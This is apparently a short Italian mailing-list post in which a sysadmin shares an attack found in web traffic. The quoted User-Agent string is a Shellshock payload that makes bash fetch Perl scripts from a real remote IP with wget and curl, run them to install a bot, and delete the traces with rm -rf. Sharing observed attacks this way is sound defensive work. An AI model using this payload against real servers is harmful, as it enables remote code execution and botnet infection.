Autor: Giuseppe De Marco
Data:
A: Flussi di ciotia.
Assumpte: [Ciotoflow] attacco che sfrutta variabile user-agent
nello user agent guarda un pò che hanno ficcato:
'() { :;}; /bin/bash -c "wget -O /tmp/s
http://178.18.24.165/s;curl -O
/tmp/s
http://178.18.24.165/s;perl /tmp/s;rm -rf /tmp/s*;wget -O
/tmp/e
http://178.18.24.165/e;curl -O /tmp/e
http://178.18.24.165/e;perl /tmp/e;rm -rf /tmp/e"'
tututo per eseguire sto bot
http://178.18.24.165/s